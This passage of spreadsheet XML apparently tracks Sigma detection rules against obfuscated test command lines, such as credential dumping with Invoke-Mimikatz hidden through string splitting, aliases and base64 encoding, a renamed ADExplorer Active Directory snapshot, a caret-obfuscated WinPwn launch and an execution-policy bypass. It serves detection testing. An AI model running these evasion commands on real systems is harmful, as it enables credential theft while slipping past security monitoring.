          <t>powershell.exe /"Command" "[scriptblock]::Create('In' + 'voke-Mimikatz').Invoke()"</t>
        </is>
      </c>
      <c r="F218" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G218" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H218" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I218" s="43" t="n"/>
      <c r="J218" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K218" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="219" ht="15.75" customHeight="1" s="42">
      <c r="A219" s="43" t="n"/>
      <c r="B219" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C219" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D219" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E219" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "[scriptblock]::Create('In' + 'voke-Mimikatz').Invoke()"</t>
        </is>
      </c>
      <c r="F219" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G219" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H219" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I219" s="36" t="n"/>
      <c r="J219" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K219" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="220" ht="15.75" customHeight="1" s="42">
      <c r="A220" s="43" t="n"/>
      <c r="B220" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C220" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D220" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E220" s="36" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "Set-Alias 'NotMalicious' 'Invoke-Mimikatz'; NotMalicious"</t>
        </is>
      </c>
      <c r="F220" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G220" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H220" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I220" s="36" t="n"/>
      <c r="J220" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K220" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="221" ht="15.75" customHeight="1" s="42">
      <c r="A221" s="43" t="n"/>
      <c r="B221" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C221" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D221" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E221" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -EncodedCommand SQBuAHYAbwBrAGUALQBNAGkAbQBpAGsAYQB0AHoA</t>
        </is>
      </c>
      <c r="F221" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G221" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H221" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I221" s="36" t="n"/>
      <c r="J221" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K221" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="222" ht="15.75" customHeight="1" s="42">
      <c r="A222" s="43" t="n"/>
      <c r="B222" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C222" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D222" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E222" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -enc SQBuAHYAbwBrAGUALQBNAGkAbQBpAGsAYQB0AHoA</t>
        </is>
      </c>
      <c r="F222" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G222" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H222" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I222" s="36" t="n"/>
      <c r="J222" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K222" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="223" ht="15.75" customHeight="1" s="42">
      <c r="A223" s="43" t="n"/>
      <c r="B223" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C223" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D223" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E223" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -EncodeDcommANd SQBuAHYAbwBrAGUALQBNAGkAbQBpAGsAYQB0AHoA</t>
        </is>
      </c>
      <c r="F223" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G223" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H223" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I223" s="43" t="n"/>
      <c r="J223" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K223" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="224" ht="15.75" customHeight="1" s="42">
      <c r="A224" s="43" t="n"/>
      <c r="B224" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C224" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D224" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E224" s="36" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "$part1 = 'Invoke-'; $part2 = 'Mimikatz'; $cmd = $part1 + $part2; iex $cmd"</t>
        </is>
      </c>
      <c r="F224" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G224" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H224" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I224" s="36" t="n"/>
      <c r="J224" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K224" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="225" ht="15.75" customHeight="1" s="42">
      <c r="A225" s="43" t="n"/>
      <c r="B225" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C225" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D225" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E225" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F225" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G225" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H225" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I225" s="36" t="n"/>
      <c r="J225" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K225" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="226" ht="15.75" customHeight="1" s="42">
      <c r="A226" s="43" t="n"/>
      <c r="B226" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C226" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D226" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E226" s="36" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "$c = 'Invoke-Mimikatz'; Invoke-Expression $c"</t>
        </is>
      </c>
      <c r="F226" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G226" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H226" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I226" s="43" t="n"/>
      <c r="J226" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K226" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="227" ht="15.75" customHeight="1" s="42">
      <c r="A227" s="43" t="n"/>
      <c r="B227" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C227" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D227" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E227" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "$c = 'Invoke-Mimikatz'; Invoke-Expression $c"</t>
        </is>
      </c>
      <c r="F227" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G227" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H227" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I227" s="36" t="n"/>
      <c r="J227" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K227" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="228" ht="15.75" customHeight="1" s="42">
      <c r="A228" s="43" t="n"/>
      <c r="B228" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C228" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D228" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E228" s="43" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "Set-Alias -Name 'NotMalicious' -Value 'Invoke-Mimikatz'; NotMalicious"</t>
        </is>
      </c>
      <c r="F228" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G228" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H228" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I228" s="43" t="n"/>
      <c r="J228" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K228" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="229" ht="15.75" customHeight="1" s="42">
      <c r="A229" s="43" t="n"/>
      <c r="B229" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_sysinternals_adexplorer_susp_execution</t>
        </is>
      </c>
      <c r="C229" s="36" t="inlineStr">
        <is>
          <t>Suspicious Active Directory Database Snapshot Via ADExplorer</t>
        </is>
      </c>
      <c r="D229" s="36" t="inlineStr">
        <is>
          <t>ef61af62-bc74-4f58-b49b-626448227652</t>
        </is>
      </c>
      <c r="E229" s="36" t="inlineStr">
        <is>
          <t>cmd /c "copy C:\Tools\ADExplorer64.exe C:\Windows\System32\sysinfo.exe &amp;&amp; C:\Windows\System32\sysinfo.exe -snapshot C:\PerfLogs\ad.db"</t>
        </is>
      </c>
      <c r="F229" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G229" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H229" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I229" s="43" t="n"/>
      <c r="J229" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K229" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="230" ht="15.75" customHeight="1" s="42">
      <c r="A230" s="43" t="n"/>
      <c r="B230" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_sysinternals_adexplorer_susp_execution</t>
        </is>
      </c>
      <c r="C230" s="36" t="inlineStr">
        <is>
          <t>Suspicious Active Directory Database Snapshot Via ADExplorer</t>
        </is>
      </c>
      <c r="D230" s="36" t="inlineStr">
        <is>
          <t>ef61af62-bc74-4f58-b49b-626448227652</t>
        </is>
      </c>
      <c r="E230" s="36" t="inlineStr">
        <is>
          <t>cmd /C "copy C:\Tools\ADExplorer64.exe C:\Windows\System32\sysinfo.exe &amp;&amp; C:\Windows\System32\sysinfo.exe -snapshot C:\PerfLogs\ad.db"</t>
        </is>
      </c>
      <c r="F230" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G230" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H230" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I230" s="43" t="n"/>
      <c r="J230" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K230" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="231" ht="15.75" customHeight="1" s="42">
      <c r="A231" s="43" t="inlineStr">
        <is>
          <t>t1082</t>
        </is>
      </c>
      <c r="B231" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_dtrace_kernel_dump</t>
        </is>
      </c>
      <c r="C231" s="36" t="inlineStr">
        <is>
          <t>Suspicious Kernel Dump Using Dtrace</t>
        </is>
      </c>
      <c r="D231" s="36" t="inlineStr">
        <is>
          <t>7124aebe-4cd7-4ccb-8df0-6d6b93c96795</t>
        </is>
      </c>
      <c r="E231" s="36" t="inlineStr">
        <is>
          <t>dtrace.exe -w "syscall:::return {lkd(0x0); exit(0);}"</t>
        </is>
      </c>
      <c r="F231" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G231" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H231" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I231" s="43" t="n"/>
      <c r="J231" s="36" t="n">
        <v>2</v>
      </c>
      <c r="K231" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="232" ht="15.75" customHeight="1" s="42">
      <c r="A232" s="43" t="inlineStr">
        <is>
          <t>t1082</t>
        </is>
      </c>
      <c r="B232" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_dtrace_kernel_dump</t>
        </is>
      </c>
      <c r="C232" s="36" t="inlineStr">
        <is>
          <t>Suspicious Kernel Dump Using Dtrace</t>
        </is>
      </c>
      <c r="D232" s="36" t="inlineStr">
        <is>
          <t>7124aebe-4cd7-4ccb-8df0-6d6b93c96795</t>
        </is>
      </c>
      <c r="E232" s="36" t="inlineStr">
        <is>
          <t>dtrace.exe -w "syscall:::return {lkd( 0 ); exit(0);}"</t>
        </is>
      </c>
      <c r="F232" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G232" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H232" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I232" s="43" t="n"/>
      <c r="J232" s="36" t="n">
        <v>2</v>
      </c>
      <c r="K232" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="233" ht="15.75" customHeight="1" s="42">
      <c r="A233" s="43" t="inlineStr">
        <is>
          <t>t1082</t>
        </is>
      </c>
      <c r="B233" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_dtrace_kernel_dump</t>
        </is>
      </c>
      <c r="C233" s="36" t="inlineStr">
        <is>
          <t>Suspicious Kernel Dump Using Dtrace</t>
        </is>
      </c>
      <c r="D233" s="36" t="inlineStr">
        <is>
          <t>7124aebe-4cd7-4ccb-8df0-6d6b93c96795</t>
        </is>
      </c>
      <c r="E233" s="36" t="inlineStr">
        <is>
          <t>dtrace.exe -w "syscall:::return {lkd(0); exit(0);}"</t>
        </is>
      </c>
      <c r="F233" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G233" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H233" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I233" s="43" t="n"/>
      <c r="J233" s="36" t="n">
        <v>2</v>
      </c>
      <c r="K233" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="234" ht="15.75" customHeight="1" s="42">
      <c r="A234" s="43" t="n"/>
      <c r="B234" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C234" s="36" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D234" s="36" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E234" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /c "W^in^P^wn.exe"</t>
        </is>
      </c>
      <c r="F234" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G234" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H234" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I234" s="43" t="n"/>
      <c r="J234" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K234" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="235" ht="15.75" customHeight="1" s="42">
      <c r="A235" s="43" t="n"/>
      <c r="B235" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C235" s="36" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D235" s="36" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E235" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -ExecutionPolicy bypass /"file" C:\temp\audit.ps1</t>
        </is>
      </c>
      <c r="F235" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G235" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H235" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I235" s="43" t="n"/>
      <c r="J235" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K235" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="236" ht="15.75" customHeight="1" s="42">
      <c r="A236" s="43" t="n"/>
      <c r="B236" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_machineguid</t>
        </is>
      </c>
      <c r="C236" s="36" t="inlineStr">
        <is>
          <t>Suspicious Query of MachineGUID</t>
        </is>
      </c>
      <c r="D236" s="36" t="inlineStr">
        <is>
          <t>f5240972-3938-4e56-8e4b-e33893176c1f</t>
        </is>
      </c>
      <c r="E236" s="36" t="inlineStr">
        <is>
          <t>powershell -"NoProfile" -CommAnd "[Microsoft.Win32.Registry]::LocalMachine.OpenSubKey('SOFTWARE\Microsoft\Cryptography').GetValue('MachineGuid')"</t>
        </is>
      </c>
      <c r="F236" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G236" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H236" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I236" s="43" t="n"/>
      <c r="J236" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K236" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="237" ht="15.75" customHeight="1" s="42">
      <c r="A237" s="43" t="n"/>
      <c r="B237" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_machineguid</t>
        </is>
      </c>
      <c r="C237" s="36" t="inlineStr">
        <is>
          <t>Suspicious Query of MachineGUID</t>
        </is>
      </c>
      <c r="D237" s="36" t="inlineStr">
        <is>
          <t>f5240972-3938-4e56-8e4b-e33893176c1f</t>
        </is>
      </c>
      <c r="E237" s="36" t="inlineStr">
        <is>
          <t>powershell -NOpROfILE -"Command" "[Microsoft.Win32.Registry]::LocalMachine.OpenSubKey('SOFTWARE\Microsoft\Cryptography').GetValue('MachineGuid')"</t>
        </is>
      </c>
      <c r="F237" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G237" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H237" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I237" s="43" t="n"/>
      <c r="J237" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K237" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="238" ht="15.75" customHeight="1" s="42">
      <c r="A238" s="43" t="n"/>
      <c r="B238" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_machineguid</t>
        </is>
      </c>
      <c r="C238" s="36" t="inlineStr">
        <is>
          <t>Suspicious Query of MachineGUID</t>
        </is>
      </c>
      <c r="D238" s="36" t="inlineStr">
        <is>
          <t>f5240972-3938-4e56-8e4b-e33893176c1f</t>
        </is>
      </c>
      <c r="E238" s="36" t="inlineStr">
        <is>
          <t>powershell -"NoProfile" -cOmMand "[Microsoft.Win32.Registry]::LocalMachine.OpenSubKey('SOFTWARE\Microsoft\Cryptography').GetValue('MachineGuid')"</t>
        </is>
      </c>
      <c r="F238" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G238" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H238" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I238" s="43" t="n"/>
      <c r="J238" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K238" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="239" ht="15.75" customHeight="1" s="42">
      <c r="A239" s="43" t="n"/>
      <c r="B239" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_machineguid</t>
        </is>
      </c>
      <c r="C239" s="43" t="inlineStr">
        <is>
          <t>Suspicious Query of MachineGUID</t>
        </is>
      </c>
      <c r="D239" s="43" t="inlineStr">
        <is>
          <t>f5240972-3938-4e56-8e4b-e33893176c1f</t>
        </is>
      </c>
      <c r="E239" s="43" t="inlineStr">
        <is>
          <t>powershell -nop /"Command" "[Microsoft.Win32.Registry]::LocalMachine.OpenSubKey('SOFTWARE\Microsoft\Cryptography').GetValue('MachineGuid')"</t>
        </is>
      </c>
      <c r="F239" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G239" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H239" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I239" s="43" t="n"/>
      <c r="J239" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K239" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="240" ht="15.75" customHeight="1" s="42">
      <c r="A240" s="36" t="n"/>
      <c r="B240" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_machineguid</t>
        </is>
      </c>
      <c r="C240" s="36" t="inlineStr">
        <is>
          <t>Suspicious Query of MachineGUID</t>
        </is>
      </c>
      <c r="D240" s="36" t="inlineStr">
        <is>
          <t>f5240972-3938-4e56-8e4b-e33893176c1f</t>
        </is>
      </c>
      <c r="E240" s="36" t="inlineStr">
        <is>
          <t>powershell /"NoProfile" -c "Get-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Cryptography' | Select-Object -ExpandProperty MachineGuid"</t>
        </is>
      </c>
      <c r="F240" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G240" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H240" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I240" s="43" t="n"/>
      <c r="J240" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K240" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="241" ht="15.75" customHeight="1" s="42">
      <c r="A241" s="36" t="n"/>
      <c r="B241" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_machineguid</t>
        </is>
      </c>
      <c r="C241" s="36" t="inlineStr">
        <is>
          <t>Suspicious Query of MachineGUID</t>
        </is>
      </c>
      <c r="D241" s="36" t="inlineStr">
        <is>
          <t>f5240972-3938-4e56-8e4b-e33893176c1f</t>
        </is>
      </c>
      <c r="E241" s="36" t="inlineStr">
        <is>
          <t>powershell -"NoProfile" -c "Get-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Cryptography' | Select-Object -ExpandProperty MachineGuid"</t>
        </is>
      </c>
      <c r="F241" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G241" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H241" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I241" s="43" t="n"/>
      <c r="J241" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K241" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="242" ht="15.75" customHeight="1" s="42">
      <c r="A242" s="36" t="n"/>
      <c r="B242" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_machineguid</t>
        </is>
      </c>
      <c r="C242" s="36" t="inlineStr">
        <is>
          <t>Suspicious Query of MachineGUID</t>
        </is>
      </c>
      <c r="D242" s="36" t="inlineStr">
        <is>
          <t>f5240972-3938-4e56-8e4b-e33893176c1f</t>
        </is>
      </c>
      <c r="E242" s="36" t="inlineStr">
        <is>
          <t>powershell /"NoProfile" -COmmanD "Get-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Cryptography' | Select-Object -ExpandProperty MachineGuid"</t>
        </is>
      </c>
      <c r="F242" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G242" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H242" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I242" s="43" t="n"/>
      <c r="J242" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K242" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="243" ht="15.75" customHeight="1" s="42">
      <c r="A243" s="36" t="n"/>
      <c r="B243" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_machineguid</t>
        </is>
      </c>
      <c r="C243" s="36" t="inlineStr">
        <is>
          <t>Suspicious Query of MachineGUID</t>
        </is>
      </c>
      <c r="D243" s="36" t="inlineStr">
        <is>
          <t>f5240972-3938-4e56-8e4b-e33893176c1f</t>
        </is>
      </c>
      <c r="E243" s="43" t="inlineStr">
        <is>
          <t>powershell /"NoProfile" -cOmmAnD "Get-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Cryptography' | Select-Object -ExpandProperty MachineGuid"</t>
        </is>
      </c>
      <c r="F243" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G243" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H243" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I243" s="43" t="n"/>
      <c r="J243" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K243" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="244" ht="15.75" customHeight="1" s="42">
      <c r="A244" s="43" t="n"/>
      <c r="B244" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_recon_product_class</t>
        </is>
      </c>
      <c r="C244" s="36" t="inlineStr">
        <is>
          <t>Potential Product Class Reconnaissance Via Wmic.EXE</t>
        </is>
      </c>
      <c r="D244" s="36" t="inlineStr">
        <is>
          <t>e568650b-5dcd-4658-8f34-ded0b1e13992</t>
        </is>
      </c>
      <c r="E244" s="36" t="inlineStr">
        <is>
          <t>wmic.exe /Namespace:\root\CIMV2 Path Win32_Process Get Name</t>
        </is>
      </c>
      <c r="F244" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G244" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H244" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I244" s="36" t="n"/>
      <c r="J244" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K244" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="245" ht="15.75" customHeight="1" s="42">
      <c r="A245" s="43" t="n"/>
      <c r="B245" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_recon_product_class</t>
        </is>
      </c>
      <c r="C245" s="36" t="inlineStr">
        <is>
          <t>Potential Product Class Reconnaissance Via Wmic.EXE</t>
        </is>
      </c>
      <c r="D245" s="36" t="inlineStr">
        <is>
          <t>e568650b-5dcd-4658-8f34-ded0b1e13992</t>
        </is>
      </c>
      <c r="E245" s="36" t="inlineStr">
        <is>
          <t>wmic.exe /nAmEspACe:\rooT\CImv2 Path Win32_Process Get Name</t>
        </is>
      </c>
      <c r="F245" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G245" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H245" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I245" s="43" t="n"/>
      <c r="J245" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K245" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="246" ht="15.75" customHeight="1" s="42">
      <c r="A246" s="43" t="n"/>
      <c r="B246" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_recon_product_class</t>
        </is>
      </c>
      <c r="C246" s="36" t="inlineStr">
        <is>
          <t>Potential Product Class Reconnaissance Via Wmic.EXE</t>
        </is>
      </c>
      <c r="D246" s="36" t="inlineStr">
        <is>
          <t>e568650b-5dcd-4658-8f34-ded0b1e13992</t>
        </is>
      </c>
      <c r="E246" s="36" t="inlineStr">
        <is>
          <t>wmic.exe /nAmESPACE:\root\cimv2 Path Win32_Process Get Name</t>
        </is>
      </c>
      <c r="F246" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G246" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H246" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I246" s="43" t="n"/>
      <c r="J246" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K246" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="247" ht="15.75" customHeight="1" s="42">
      <c r="A247" s="43" t="n"/>
      <c r="B247" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_recon_product_class</t>
        </is>
      </c>
      <c r="C247" s="36" t="inlineStr">
        <is>
          <t>Potential Product Class Reconnaissance Via Wmic.EXE</t>
        </is>
      </c>
